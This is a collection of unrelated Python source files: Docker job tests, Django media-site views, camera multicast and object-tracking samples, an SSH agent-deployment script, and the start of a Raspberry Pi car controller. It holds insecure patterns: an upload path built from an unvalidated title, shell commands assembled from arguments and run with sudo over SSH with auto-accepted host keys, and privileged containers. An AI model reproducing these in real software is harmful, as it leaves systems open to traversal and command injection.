assert rv == True
def testNonCachingDockerChain(self):
self.testDockerPipeChain(disableCaching=False)
def testNonCachingDockerChainErrorDetection(self):
self.testDockerPipeChainErrorDetection(disableCaching=False)
def testDockerLogs(self, stream=False, demux=False):
"""Test for the different log outputs when deatch=False."""
working_dir = os.path.join(self.tempDir, 'working')
script_file = os.path.join(working_dir, 'script.sh')
os.makedirs(working_dir, exist_ok=True)
options = Job.Runner.getDefaultOptions(os.path.join(self.tempDir, 'jobstore'))
options.logLevel = self.dockerTestLogLevel
options.workDir = working_dir
options.clean = 'always'
A = Job.wrapJobFn(_testDockerLogsFn,
working_dir=working_dir,
script_file=script_file,
stream=stream,
demux=demux)
try:
rv = Job.Runner.startToil(A, options)
assert rv == True
finally:
try:
os.remove(script_file)
except:
pass
def testDockerLogs_Stream(self):
self.testDockerLogs(stream=True, demux=False)
def testDockerLogs_Demux(self):
self.testDockerLogs(stream=False, demux=True)
def testDockerLogs_Demux_Stream(self):
self.testDockerLogs(stream=True, demux=True)
def _testDockerCleanFn(job,
working_dir,
detached=None,
rm=None,
deferParam=None,
containerName=None):
"""
Test function for test docker_clean. Runs a container with given flags and
then dies leaving behind a zombie container.
:param toil.job.Job job: job
:param working_dir: See `work_dir=` in :func:`dockerCall`
:param bool rm: See `rm=` in :func:`dockerCall`
:param bool detached: See `detached=` in :func:`dockerCall`
:param int deferParam: See `deferParam=` in :func:`dockerCall`
:param str containerName: See `container_name=` in :func:`dockerCall`
"""
def killSelf():
test_file = os.path.join(working_dir, 'test.txt')
# Kill the worker once we are sure the docker container is started
while not os.path.exists(test_file):
logger.debug('Waiting on the file created by spooky_container.')
time.sleep(1)
# By the time we reach here, we are sure the container is running.
time.sleep(1)
os.kill(os.getpid(), signal.SIGKILL)
t = Thread(target=killSelf)
# Make it a daemon thread so that thread failure doesn't hang tests.
t.daemon = True
t.start()
apiDockerCall(job,
image='quay.io/ucsc_cgl/spooky_test',
working_dir=working_dir,
deferParam=deferParam,
containerName=containerName,
detach=detached,
remove=rm,
privileged=True)
def _testDockerPipeChainFn(job):
"""Return the result of a simple pipe chain. Should be 2."""
parameters = [['printf', 'x\n y\n'], ['wc', '-l']]
return apiDockerCall(job,
image='ubuntu:latest',
parameters=parameters,
privileged=True)
def _testDockerPipeChainErrorFn(job):
"""Return True if the command exit 1 | wc -l raises a ContainerError."""
parameters = [['exit', '1'], ['wc', '-l']]
try:
apiDockerCall(job,
image='quay.io/ucsc_cgl/spooky_test',
parameters=parameters)
except ContainerError:
return True
return False
def _testDockerLogsFn(job,
working_dir,
script_file,
stream=False,
demux=False):
"""Return True if the test succeeds. Otherwise Exception is raised."""
# we write a script file because the redirection operator, '>&2', is wrapped
# in quotes when passed as parameters.
import textwrap
bash_script = textwrap.dedent('''
#!/bin/bash
echo hello stdout ;
echo hello stderr >&2 ;
echo hello stdout ;
echo hello stderr >&2 ;
echo hello stdout ;
echo hello stdout ;
''')
with open(script_file, 'w') as file:
file.write(bash_script)
out = apiDockerCall(job,
image='ubuntu:latest',
working_dir=working_dir,
parameters=[script_file],
volumes={working_dir: {'bind': working_dir, 'mode': 'rw'}},
entrypoint="/bin/bash",
stdout=True,
stderr=True,
stream=stream,
demux=demux)
# we check the output length because order is not guaranteed.
if stream:
if demux:
# a generator with tuples of (stdout, stderr)
assert hasattr(out, '__iter__')
for _ in range(6):
stdout, stderr = next(out)
if stdout:
# len('hello stdout\n') == 13
assert len(stdout) == 13
elif stderr:
assert len(stderr) == 13
else:
assert False
else:
# a generator with bytes
assert hasattr(out, '__iter__')
for _ in range(6):
assert len(next(out)) == 13
else:
if demux:
# a tuple of (stdout, stderr)
stdout, stderr = out
# len('hello stdout\n' * 4) == 52
assert len(stdout) == 52
# len('hello stderr\n' * 2) == 26
assert len(stderr) == 26
else:
# a bytes object
# len('hello stdout\n' * 4 + 'hello stderr\n' * 2) == 78
assert len(out) == 78
return True
|
views.py
|
import os
from threading import Thread
from tempfile import gettempdir
from django.shortcuts import render, redirect, get_object_or_404
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.password_validation import validate_password, ValidationError
from django.http import HttpResponse
from django.contrib import messages
from .forms import LoginForm, SongUpload
from .models import Song
from .videoutils import hlsify, loadkey
def index(request):
return render(request, "index.html", {"username": request.user.get_username()})
def mymedia(request):
if request.user.is_authenticated:
return render(request, "mymedia.html", {"media": Song.objects.all().filter(uploader=request.user)})
else:
messages.error(request, "you are not logged in")
return redirect("/login/")
def medialist(request):
return render(request, "medialist.html", {"media": Song.objects.all().filter(privacy="public")})
@csrf_protect
def loginpage(request):
if request.method == "GET":
return render(request, "form.html", {"form": LoginForm(),
"destination": "/login/",
"action": "Login",
"title": "Login"})
elif request.method == "POST":
loginform = LoginForm(request.POST)
if not loginform.is_valid():
messages.error(request, "login form invalid")
return redirect("/login/")
formdata = loginform.cleaned_data
user = authenticate(request, username=formdata["username"], password=formdata["password"])
if not user is None:
login(request, user)
messages.success(request, "you have successfully logged in!")
return redirect("/")
else:
messages.error(request, "authentication failed")
return redirect("/login/")
else:
return HttpResponse(status=405)
def logoutuser(request):
logout(request)
messages.success(request, "successfully logged out")
return redirect("/")
@csrf_protect
def passwordchange(request):
user = request.user
if user.is_authenticated:
if request.method == "GET":
return render(request, "passwordreset.html")
elif request.method == "POST":
if not user.check_password(request.POST["oldpassword"]):
messages.error(request, "old password incorrect")
return redirect("/resetpassword/")
password = request.POST["password"]
try:
validate_password(password)
except ValidationError as errors:
for error in errors:
messages.error(request, error)
return redirect("/resetpassword/")
user.set_password(password)
user.save()
messages.success(request, "password changed")
return redirect("/")
else:
return HttpResponse(status=405)
else:
messages.error(request, "you are not logged in")
return redirect("/login/")
@csrf_protect
def uploadpage(request):
user = request.user
if not user.is_authenticated:
messages.error(request, "you are not logged in")
return redirect("/login/")
if request.method == "GET":
return render(request, "form.html", {"form": SongUpload,
"destination": "/upload/",
"action": "Upload",
"title": "Upload Media",
"fileupload": True})
elif request.method == "POST":
if not user.is_superuser and len(Song.objects.all().filter(uploader=user)) >= 5:
messages.error(request, "storage limit exceeded, delete your old media")
return redirect("/mymedia/")
uploadform = SongUpload(request.POST)
if uploadform.is_valid():
title = uploadform.cleaned_data["title"]
templocation = os.path.join(gettempdir(), title + ".media")
f = open(templocation, "wb+")
for chunk in request.FILES["mediafile"]:
f.write(chunk)
f.close()
data = uploadform.save(commit=False)
data.uploader = user
data.save()
t = Thread(target=hlsify, args=(title, templocation))
t.start()
messages.success(request, "media successfully uploaded")
return redirect("/mymedia/")
messages.error(request, "upload form invalid")
return redirect("/")
else:
return HttpResponse(status=405)
def player(request):
video = request.session.get("video", True)
return render(request, "player.html", {"video": video})
def getkey(request):
requested = request.GET["media"]
media = get_object_or_404(Song, title=requested)
if not media.privacy == "private":
return HttpResponse(loadkey(requested), content_type="application/octet-stream")
if request.user.is_authenticated:
if media.uploader == request.user:
return HttpResponse(loadkey(requested), content_type="application/octet-stream")
else:
return HttpResponse(status=401)
else:
return HttpResponse(status=403)
@csrf_protect
def edit(request):
if not request.user.is_authenticated:
return HttpResponse(status=403)
media = get_object_or_404(Song, title=request.GET.get("media"))
if not media.uploader == request.user:
return HttpResponse(status=401)
if request.method == "GET":
return render(request, "edit.html", {"media": media})
elif request.method == "POST":
if request.POST.get("delete") == "true":
media.delete()
messages.success(request, "deleted successfully")
return redirect("/mymedia/")
try:
newprivacy = request.POST["privacy"]
except KeyError:
return HttpResponse(status=400)
media.privacy = newprivacy
media.save()
messages.success(request, "edited successfully")
return redirect("/mymedia/")
else:
return HttpResponse(status=405)
def togglemode(request):
currentmode = request.session.get("video", True)
request.session["video"] = not currentmode
return redirect("/")
|
MultiCast.py
|
# -- coding: utf-8 --
import sys
import threading
import termios
from ctypes import *
sys.path.append("../MvImport")
from MvCameraControl_class import *
g_bExit = False
# 为线程定义一个函�?
def work_thread(cam=0, pData=0, nDataSize=0):
stFrameInfo = MV_FRAME_OUT_INFO_EX()
memset(byref(stFrameInfo), 0, sizeof(stFrameInfo))
while True:
ret = cam.MV_CC_GetOneFrameTimeout(pData, nDataSize, stFrameInfo, 1000)
if ret == 0:
print ("get one frame: Width[%d], Height[%d], nFrameNum[%d]" % (stFrameInfo.nWidth, stFrameInfo.nHeight, stFrameInfo.nFrameNum))
else:
print ("no data[0x%x]" % ret)
if g_bExit == True:
break
def press_any_key_exit():
fd = sys.stdin.fileno()
old_ttyinfo = termios.tcgetattr(fd)
new_ttyinfo = old_ttyinfo[:]
new_ttyinfo[3] &= ~termios.ICANON
new_ttyinfo[3] &= ~termios.ECHO
#sys.stdout.write(msg)
#sys.stdout.flush()
termios.tcsetattr(fd, termios.TCSANOW, new_ttyinfo)
try:
os.read(fd, 7)
except:
pass
finally:
termios.tcsetattr(fd, termios.TCSANOW, old_ttyinfo)
if __name__ == "__main__":
deviceList = MV_CC_DEVICE_INFO_LIST()
tlayerType = MV_GIGE_DEVICE | MV_USB_DEVICE
# ch:枚举设备 | en:Enum device
ret = MvCamera.MV_CC_EnumDevices(tlayerType, deviceList)
if ret != 0:
print ("enum devices fail! ret[0x%x]" % ret)
sys.exit()
if deviceList.nDeviceNum == 0:
print ("find no device!")
sys.exit()
print ("find %d devices!" % deviceList.nDeviceNum)
for i in range(0, deviceList.nDeviceNum):
mvcc_dev_info = cast(deviceList.pDeviceInfo[i], POINTER(MV_CC_DEVICE_INFO)).contents
if mvcc_dev_info.nTLayerType == MV_GIGE_DEVICE:
print ("\ngige device: [%d]" % i)
strModeName = ""
for per in mvcc_dev_info.SpecialInfo.stGigEInfo.chModelName:
strModeName = strModeName + chr(per)
print ("device model name: %s" % strModeName)
nip1 = ((mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0xff000000) >> 24)
nip2 = ((mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0x00ff0000) >> 16)
nip3 = ((mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0x0000ff00) >> 8)
nip4 = (mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0x000000ff)
print ("current ip: %d.%d.%d.%d\n" % (nip1, nip2, nip3, nip4))
elif mvcc_dev_info.nTLayerType == MV_USB_DEVICE:
print ("\nu3v device: [%d]" % i)
strModeName = ""
for per in mvcc_dev_info.SpecialInfo.stUsb3VInfo.chModelName:
if per == 0:
break
strModeName = strModeName + chr(per)
print ("device model name: %s" % strModeName)
strSerialNumber = ""
for per in mvcc_dev_info.SpecialInfo.stUsb3VInfo.chSerialNumber:
if per == 0:
break
strSerialNumber = strSerialNumber + chr(per)
print ("user serial number: %s" % strSerialNumber)
nConnectionNum = input("please input the number of the device to connect:")
if int(nConnectionNum) >= deviceList.nDeviceNum:
print ("intput error!")
sys.exit()
# ch:创建相机实例 | en:Creat Camera Object
cam = MvCamera()
# ch:选择设备并创建句�?| en:Select device and create handle
stDeviceList = cast(deviceList.pDeviceInfo[int(nConnectionNum)], POINTER(MV_CC_DEVICE_INFO)).contents
ret = cam.MV_CC_CreateHandle(stDeviceList)
if ret != 0:
print ("create handle fail! ret[0x%x]" % ret)
sys.exit()
#ch:询问用户启动多播控制应用程序或多播监控应用程�?
#en:Ask the user to launch: the multicast controlling application or the multicast monitoring application.
key = raw_input("start multicast sample in (c)ontrol or in (m)onitor mode? (c/m): ")
#ch:查询用户使用的模�?| en:Query the user for the mode to use.
monitor = False
if key == 'm' or key == 'M':
monitor = True
elif key == 'c' or key == 'C':
monitor = False
else:
print ("intput error!")
sys.exit()
if monitor:
ret = cam.MV_CC_OpenDevice(MV_ACCESS_Monitor, 0)
if ret != 0:
print ("open device fail! ret[0x%x]" % ret)
sys.exit()
else:
ret = cam.MV_CC_OpenDevice(MV_ACCESS_Control, 0)
if ret != 0:
print ("open device fail! ret[0x%x]" % ret)
sys.exit()
# ch:探测网络最佳包大小(只对GigE相机有效) | en:Detection network optimal package size(It only works for the GigE camera)
if stDeviceList.nTLayerType == MV_GIGE_DEVICE:
nPacketSize = cam.MV_CC_GetOptimalPacketSize()
if int(nPacketSize) > 0:
ret = cam.MV_CC_SetIntValue("GevSCPSPacketSize",nPacketSize)
if ret != 0:
print ("Warning: Set Packet Size fail! ret[0x%x]" % ret)
else:
print ("Warning: Get Packet Size fail! ret[0x%x]" % nPacketSize)
#ch:获取数据包大�?| en:Get payload size
stParam = MVCC_INTVALUE()
memset(byref(stParam), 0, sizeof(MVCC_INTVALUE))
ret = cam.MV_CC_GetIntValue("PayloadSize", stParam)
if ret != 0:
print ("get payload size fail! ret[0x%x]" % ret)
sys.exit()
nPayloadSize = stParam.nCurValue
#ch:指定组播ip | en:multicast IP
strIp = "239.192.1.1"
device_ip_list = strIp.split('.')
dest_ip = (int(device_ip_list[0]) << 24) | (int(device_ip_list[1]) << 16) | (int(device_ip_list[2]) << 8) | int(device_ip_list[3])
print ("dest ip: %s" % strIp)
#ch:可指定端口号作为组播组端�?| en:multicast port
stTransmissionType = MV_TRANSMISSION_TYPE()
memset(byref(stTransmissionType), 0, sizeof(MV_TRANSMISSION_TYPE))
stTransmissionType.enTransmissionType = MV_GIGE_TRANSTYPE_MULTICAST
stTransmissionType.nDestIp = dest_ip
stTransmissionType.nDestPort = 1042
ret = cam.MV_GIGE_SetTransmissionType(stTransmissionType)
if MV_OK != ret:
print ("set transmission type fail! ret [0x%x]" % ret)
# ch:开始取�?| en:Start grab image
ret = cam.MV_CC_StartGrabbing()
if ret != 0:
print ("start grabbing fail! ret[0x%x]" % ret)
sys.exit()
data_buf = (c_ubyte * nPayloadSize)()
try:
hThreadHandle = threading.Thread(target=work_thread, args=(cam, byref(data_buf), nPayloadSize))
hThreadHandle.start()
except:
print ("error: unable to start thread")
print ("press a key to stop grabbing.")
press_any_key_exit()
g_bExit = True
hThreadHandle.join()
# ch:停止取流 | en:Stop grab image
ret = cam.MV_CC_StopGrabbing()
if ret != 0:
print ("stop grabbing fail! ret[0x%x]" % ret)
del data_buf
sys.exit()
# ch:关闭设备 | Close device
ret = cam.MV_CC_CloseDevice()
if ret != 0:
print ("close deivce fail! ret[0x%x]" % ret)
del data_buf
sys.exit()
# ch:销毁句�?| Destroy handle
ret = cam.MV_CC_DestroyHandle()
if ret != 0:
print ("destroy handle fail! ret[0x%x]" % ret)
del data_buf
sys.exit()
del data_buf
|
app.py
|
#!/usr/bin/env python3
from pathlib import Path
from types import SimpleNamespace
import argparse
import logging
import json
import cv2
import fastmot
import fastmot.models
from fastmot.utils import ConfigDecoder, Profiler
def motcount(inputurl, count_global, process_number):
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
optional = parser._action_groups.pop()
required = parser.add_argument_group('required arguments')
group = parser.add_mutually_exclusive_group()
"""
required.add_argument('-i', '--input-uri', metavar="URI", required=True, help=
'URI to input stream\n'
'1) image sequence (e.g. %%06d.jpg)\n'
'2) video file (e.g. file.mp4)\n'
'3) MIPI CSI camera (e.g. csi://0)\n'
'4) USB camera (e.g. /dev/video0)\n'
'5) RTSP stream (e.g. rtsp://<user>:<password>@<ip>:<port>/<path>)\n'
'6) HTTP stream (e.g. http://<user>:<password>@<ip>:<port>/<path>)\n')
"""
optional.add_argument('-c', '--config', metavar="FILE",
default=Path(__file__).parent / 'cfg' / 'mot.json',
help='path to JSON configuration file')
optional.add_argument('-l', '--labels', metavar="FILE",
help='path to label names (e.g. coco.names)')
optional.add_argument('-o', '--output-uri', metavar="URI",
help='URI to output video file')
optional.add_argument('-t', '--txt', metavar="FILE",
help='path to output MOT Challenge format results (e.g. MOT20-01.txt)')
optional.add_argument('-m', '--mot', action='store_true', help='run multiple object tracker')
optional.add_argument('-s', '--show', action='store_true', help='show visualizations')
group.add_argument('-q', '--quiet', action='store_true', help='reduce output verbosity')
group.add_argument('-v', '--verbose', action='store_true', help='increase output verbosity')
parser._action_groups.append(optional)
args = parser.parse_args()
args.mot=True
args.show=True
args.config='/home/geodrones/Documents/FastMOT/cfg/nano_v4tinyCH_fastobj.json'
args.input_uri = inputurl
if args.txt is not None and not args.mot:
raise parser.error('argument -t/--txt: not allowed without argument -m/--mot')
# set up logging
logging.basicConfig(format='%(asctime)s [%(levelname)8s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(fastmot.__name__)
if args.quiet:
logger.setLevel(logging.WARNING)
elif args.verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
# load config file
with open(args.config) as cfg_file:
config = json.load(cfg_file, cls=ConfigDecoder, object_hook=lambda d: SimpleNamespace(**d))
# load labels if given
if args.labels is not None:
with open(args.labels) as label_file:
label_map = label_file.read().splitlines()
fastmot.models.set_label_map(label_map)
stream = fastmot.VideoIO(config.resize_to, args.input_uri, args.output_uri, **vars(config.stream_cfg))
#stream2 = fastmot.VideoIO(config.resize_to, 'csi://1', args.output_uri, **vars(config.stream_cfg))
mot = None
#mot2 = None
txt = None
if args.mot:
draw = args.show or args.output_uri is not None
mot = fastmot.MOT(config.resize_to, count_global, **vars(config.mot_cfg), draw=draw)
mot.reset(stream.cap_dt)
#mot2 = fastmot.MOT(config.resize_to, **vars(config.mot_cfg), draw=draw)
#mot2.reset(stream.cap_dt)
if args.txt is not None:
Path(args.txt).parent.mkdir(parents=True, exist_ok=True)
txt = open(args.txt, 'w')
if args.show:
cv2.namedWindow('Video', cv2.WINDOW_AUTOSIZE)
if process_number.value == 1:
x = 200
y = 350
else:
x = 1100
y = 350
cv2.moveWindow('Video', x, y)
logger.info('Starting video capture...')
stream.start_capture()
try:
with Profiler('app') as prof:
while not args.show or cv2.getWindowProperty('Video', 0) >= 0:
frame = stream.read()
#frame2 = stream2.read()
if frame is None:
break
if args.mot:
mot.step(frame, count_global)
#mot2.step(frame)
if txt is not None:
for track in mot.visible_tracks():
tl = track.tlbr[:2] / config.resize_to * stream.resolution
br = track.tlbr[2:] / config.resize_to * stream.resolution
w, h = br - tl + 1
txt.write(f'{mot.frame_count},{track.trk_id},{tl[0]:.6f},{tl[1]:.6f},'
f'{w:.6f},{h:.6f},-1,-1,-1\n')
if args.show:
#two_stream_stacked = cv2.hconcat([frame,frame2])
cv2.imshow('Video', frame)
#cv2.imshow('Video', two_stream_stacked)
user_key = cv2.waitKey(1) & 0xFF
if user_key == 27: #press Esc to break
break
elif user_key == 114: #press 'r' to reset count
mot.tracker.reset_count_found(count_global)
if args.output_uri is not None:
stream.write(frame)
finally:
# clean up resources
if txt is not None:
txt.close()
stream.release()
cv2.destroyAllWindows()
# timing statistics
if args.mot:
avg_fps = round(mot.frame_count / prof.duration)
logger.info('Average FPS: %d', avg_fps)
mot.print_timing_info()
from multiprocessing import Process, Value
def main():
count_global = Value('i', 0)
process_one = Value('i', 1)
process_two = Value('i', 2)
p1 = Process(target=motcount, args=('csi://0', count_global, process_one, ))
p1.start()
p2 = Process(target=motcount, args=('csi://1', count_global, process_two, ))
p2.start()
#p1.join()
#p2.join()
if __name__ == '__main__':
main()
"""
from pathlib import Path
from types import SimpleNamespace
import argparse
import logging
import json
import cv2
import fastmot
import fastmot.models
from fastmot.utils import ConfigDecoder, Profiler
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
optional = parser._action_groups.pop()
required = parser.add_argument_group('required arguments')
group = parser.add_mutually_exclusive_group()
optional.add_argument('-i', '--input-uri', metavar="URI", help=
'URI to input stream\n'
'1) image sequence (e.g. %%06d.jpg)\n'
'2) video file (e.g. file.mp4)\n'
'3) MIPI CSI camera (e.g. csi://0)\n'
'4) USB camera (e.g. /dev/video0)\n'
'5) RTSP stream (e.g. rtsp://<user>:<password>@<ip>:<port>/<path>)\n'
'6) HTTP stream (e.g. http://<user>:<password>@<ip>:<port>/<path>)\n')
optional.add_argument('-c', '--config', metavar="FILE",
default=Path(__file__).parent / 'cfg' / 'mot.json',
help='path to JSON configuration file')
optional.add_argument('-l', '--labels', metavar="FILE",
help='path to label names (e.g. coco.names)')
optional.add_argument('-o', '--output-uri', metavar="URI",
help='URI to output video file')
optional.add_argument('-t', '--txt', metavar="FILE",
help='path to output MOT Challenge format results (e.g. MOT20-01.txt)')
optional.add_argument('-m', '--mot', action='store_true', help='run multiple object tracker')
optional.add_argument('-s', '--show', action='store_true', help='show visualizations')
group.add_argument('-q', '--quiet', action='store_true', help='reduce output verbosity')
group.add_argument('-v', '--verbose', action='store_true', help='increase output verbosity')
parser._action_groups.append(optional)
args = parser.parse_args()
args.mot=True
args.show=True
args.input_uri='csi://0'
args.config='/home/geodrones/Documents/FastMOT/cfg/nano_v4tinyCH_fastobj.json'
if args.txt is not None and not args.mot:
raise parser.error('argument -t/--txt: not allowed without argument -m/--mot')
# set up logging
logging.basicConfig(format='%(asctime)s [%(levelname)8s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(fastmot.__name__)
if args.quiet:
logger.setLevel(logging.WARNING)
elif args.verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
# load config file
with open(args.config) as cfg_file:
config = json.load(cfg_file, cls=ConfigDecoder, object_hook=lambda d: SimpleNamespace(**d))
# load labels if given
if args.labels is not None:
with open(args.labels) as label_file:
label_map = label_file.read().splitlines()
fastmot.models.set_label_map(label_map)
stream = fastmot.VideoIO(config.resize_to, args.input_uri, args.output_uri, **vars(config.stream_cfg))
#stream2 = fastmot.VideoIO(config.resize_to, 'csi://1', args.output_uri, **vars(config.stream_cfg))
mot = None
#mot2 = None
txt = None
if args.mot:
draw = args.show or args.output_uri is not None
mot = fastmot.MOT(config.resize_to, **vars(config.mot_cfg), draw=draw)
mot.reset(stream.cap_dt)
#mot2 = fastmot.MOT(config.resize_to, **vars(config.mot_cfg), draw=draw)
#mot2.reset(stream.cap_dt)
if args.txt is not None:
Path(args.txt).parent.mkdir(parents=True, exist_ok=True)
txt = open(args.txt, 'w')
if args.show:
cv2.namedWindow('Video', cv2.WINDOW_AUTOSIZE)
logger.info('Starting video capture...')
stream.start_capture()
try:
with Profiler('app') as prof:
while not args.show or cv2.getWindowProperty('Video', 0) >= 0:
frame = stream.read()
#frame2 = stream2.read()
if frame is None:
break
if args.mot:
mot.step(frame)
#mot2.step(frame)
if txt is not None:
for track in mot.visible_tracks():
tl = track.tlbr[:2] / config.resize_to * stream.resolution
br = track.tlbr[2:] / config.resize_to * stream.resolution
w, h = br - tl + 1
txt.write(f'{mot.frame_count},{track.trk_id},{tl[0]:.6f},{tl[1]:.6f},'
f'{w:.6f},{h:.6f},-1,-1,-1\n')
if args.show:
#two_stream_stacked = cv2.hconcat([frame,frame2])
cv2.imshow('Video', frame)
#cv2.imshow('Video', two_stream_stacked)
user_key = cv2.waitKey(1) & 0xFF
if user_key == 27: #press Esc to break
break
elif user_key == 114: #press 'r' to reset count
mot.tracker.reset_count_found()
if args.output_uri is not None:
stream.write(frame)
finally:
# clean up resources
if txt is not None:
txt.close()
stream.release()
cv2.destroyAllWindows()
# timing statistics
if args.mot:
avg_fps = round(mot.frame_count / prof.duration)
logger.info('Average FPS: %d', avg_fps)
mot.print_timing_info()
if __name__ == '__main__':
main()
"""
|
startcron.py
|
#!/usr/bin/python
import sys
import time
import os
import getpass
import getopt
import argparse
import re
import paramiko
import socket
import Queue
import threading
def sshDeploy(retry,hostname):
global projectName
global user
global password
global userInsightfinder
global licenseKey
global samplingInterval
global reportingInterval
global agentType
if retry == 0:
print "Deploy Fail in", hostname
q.task_done()
return
print "Start deploying agent in", hostname, "..."
try:
s = paramiko.SSHClient()
s.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if os.path.isfile(password) == True:
s.connect(hostname, username=user, key_filename = password, timeout=60)
else:
s.connect(hostname, username=user, password = password, timeout=60)
transport = s.get_transport()
session = transport.open_session()
session.set_combine_stderr(True)
session.get_pty()
if agentType == "hypervisor":
command="cd InsightAgent-master && ./hypervisor/install.sh -i "+projectName+" -u "+userInsightfinder+" -k "+licenseKey+" -s "+samplingInterval+" -r "+reportingInterval+" -t "+agentType
else:
if serverUrl is None:
command="cd InsightAgent-master && sudo ./deployment/install.sh -i "+projectName+" -u "+userInsightfinder+" -k "+licenseKey+" -s "+samplingInterval+" -r "+reportingInterval+" -t "+agentType
else:
command="cd InsightAgent-master && sudo ./deployment/install.sh -i "+projectName+" -u "+userInsightfinder+" -k "+licenseKey+" -s "+samplingInterval+" -r "+reportingInterval+" -t "+agentType+" -w "+serverUrl
session.exec_command(command)
stdin = session.makefile('wb', -1)
stdout = session.makefile('rb', -1)
stdin.write(password+'\n')
stdin.flush()
session.recv_exit_status() #wait for exec_command to finish
print "Deploy Succeed in", hostname
q.task_done()
return
except paramiko.SSHException, e:
print "Invalid Username/Password for %s:"%hostname , e
return sshDeploy(retry-1,hostname)
except paramiko.AuthenticationException:
print "Authentication failed for some reason in %s:"%hostname
return sshDeploy(retry-1,hostname)
except socket.error, e:
print "Socket connection failed in %s:"%hostname, e
return sshDeploy(retry-1,hostname)
except:
print "Unexpected error in %s:"%hostname
finally:
s.close()
def get_args():
parser = argparse.ArgumentParser(
description='Script retrieves arguments for insightfinder agent.')
parser.add_argument(
'-i', '--PROJECT_NAME_IN_INSIGHTFINDER', type=str, help='Project Name registered in Insightfinder', required=True)
parser.add_argument(
'-n', '--USER_NAME_IN_HOST', type=str, help='User Name in Hosts', required=True)
parser.add_argument(
'-u', '--USER_NAME_IN_INSIGHTFINDER', type=str, help='User Name in Insightfinder', required=True)
parser.add_argument(
'-k', '--LICENSE_KEY', type=str, help='License key for the user', required=True)
parser.add_argument(
'-s', '--SAMPLING_INTERVAL_MINUTE', type=str, help='Sampling Interval Minutes', required=True)
parser.add_argument(
'-r', '--REPORTING_INTERVAL_MINUTE', type=str, help='Reporting Interval Minutes', required=True)
parser.add_argument(
'-t', '--AGENT_TYPE', type=str, help='Agent type: proc or cadvisor or docker_remote_api or cgroup or daemonset or elasticsearch or collectd or hypervisor or ec2monitoring or jolokia', choices=['proc', 'cadvisor', 'docker_remote_api', 'cgroup', 'daemonset', 'elasticsearch', 'collectd', 'hypervisor', 'ec2monitoring', 'jolokia'], required=True)
parser.add_argument(
'-p', '--PASSWORD', type=str, help='Password for hosts', required=True)
parser.add_argument('-w', '--SERVER_URL', type=str, help='Password for hosts', required=False)
args = parser.parse_args()
projectName = args.PROJECT_NAME_IN_INSIGHTFINDER
user = args.USER_NAME_IN_HOST
userInsightfinder = args.USER_NAME_IN_INSIGHTFINDER
licenseKey = args.LICENSE_KEY
samplingInterval = args.SAMPLING_INTERVAL_MINUTE
reportingInterval = args.REPORTING_INTERVAL_MINUTE
agentType = args.AGENT_TYPE
password = args.PASSWORD
serverUrl = args.SERVER_URL
return projectName, user, userInsightfinder, licenseKey, samplingInterval, reportingInterval, agentType, password, serverUrl
if __name__ == '__main__':
global projectName
global user
global password
global hostfile
global userInsightfinder
global licenseKey
global samplingInterval
global reportingInterval
global agentType
global serverUrl
hostfile="hostlist.txt"
projectName, user, userInsightfinder, licenseKey, samplingInterval, reportingInterval, agentType, password, serverUrl = get_args()
q = Queue.Queue()
try:
with open(os.getcwd()+"/"+hostfile, 'rb') as f:
while True:
line = f.readline()
if line:
host=line.split("\n")[0]
q.put(host)
else:
break
while q.empty() != True:
host = q.get()
t = threading.Thread(target=sshDeploy, args=(3,host,))
t.daemon = True
t.start()
q.join()
except (KeyboardInterrupt, SystemExit):
print "Keyboard Interrupt!!"
sys.exit()
except IOError as e:
print "I/O error({0}): {1}: {2}".format(e.errno, e.strerror, e.filename)
sys.exit()
|
mserver.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 10 21:52:21 2021
@author: qq735
"""
from multiprocessing import Process
from socket import *
# import wiringpi
import RPi.GPIO as GPIO
import time
import string
import threading
import timeout_decorator
import serial
import pynmea2
serialPort = serial.Serial("/dev/ttyUSB0", 9600, timeout=0.5)
from ctypes import *
import numpy as np
mlx90640 = cdll.LoadLibrary('./libmlx90640.so')
# 初始化上下左右角度为90度
ServoLeftRightPos = 90
ServoUpDownPos = 90
g_frontServoPos = 90
nowfrontPos = 0
# 小车电机引脚定义
IN1 = 20
IN2 = 21
IN3 = 19
IN4 = 26
ENA = 16
ENB = 13
# 超声波引脚定义
EchoPin = 0
TrigPin = 1
# RGB三色灯引脚定义
LED_R = 22
LED_G = 27
LED_B = 24
# 舵机引脚定义
FrontServoPin = 23
ServoUpDownPin = 9
ServoLeftRightPin = 11
# 红外避障引脚定义
AvoidSensorLeft = 12
AvoidSensorRight = 17
# 蜂鸣器引脚定义
buzzer = 8
# 变量的定义
# 七彩灯RGB三色变量定义
red = 0
green = 0
blue = 0
# TCP通信数据包标志位以及接受和发送数据变量
NewLineReceived = 0
InputString = ''
recvbuf = ''
ReturnTemp = ''
# 小车和舵机状态变量
g_CarState = 0
g_ServoState = 0
# 小车速度变量,20表示40cm每秒
CarSpeedControl = 20
# 寻迹,避障,寻光变量
infrared_track_value = ''
infrared_avoid_value = ''
LDR_value = ''
g_lednum = 0
# 设置GPIO口为BCM编码方式
GPIO.setmode(GPIO.BCM)
# 忽略警告信息
GPIO.setwarnings(False)
import eventlet
import time
eventlet.monkey_patch()
# 电机引脚初始化操作
def init():
global pwm_ENA
global pwm_ENB
global delaytime
global CarSpeedControl
global pwm_FrontServo
global pwm_UpDownServo
global pwm_LeftRightServo
global nowfrontPos
GPIO.setup(ENA, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(IN1, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(IN2, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(ENB, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(IN3, GPIO.OUT, initial=GPIO.LOW)
